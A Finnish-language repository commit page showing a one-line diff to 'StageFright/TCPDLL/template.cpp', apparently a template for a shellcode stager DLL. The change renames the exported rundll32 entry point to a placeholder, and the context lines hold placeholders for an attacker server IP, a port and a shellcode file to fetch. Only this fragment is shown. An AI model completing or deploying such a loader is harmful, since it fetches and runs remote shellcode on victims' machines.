Selaa lähdekoodia

Update template.cpp

assume-breach 2 vuotta sitten
vanhempi
sitoutus
1850fde30b
1 muutettua tiedostoa jossa 1 lisäystä ja 1 poistoa
  1. 1 1
      StageFright/StageFright/StageFright/TCPDLL/template.cpp

+ 1 - 1
StageFright/StageFright/StageFright/TCPDLL/template.cpp

@@ -128,7 +128,7 @@ int Random7(char* Random8, unsigned int Random8_len, char* Random9, size_t Rando
 
 char Random9[] = KEYVALUE;
 
-extern "C" void CALLBACK Go(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow) {
+extern "C" void CALLBACK ENTRYPOINT(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow) {
     const char* Random2 = "HOSTIP";        // Replace with the actual server IP
     int Random3 = PORTY;                     // Replace with the actual server port
     const char* Random4 = "SHELLCODEFILE";   // Replace with the actual file path on the server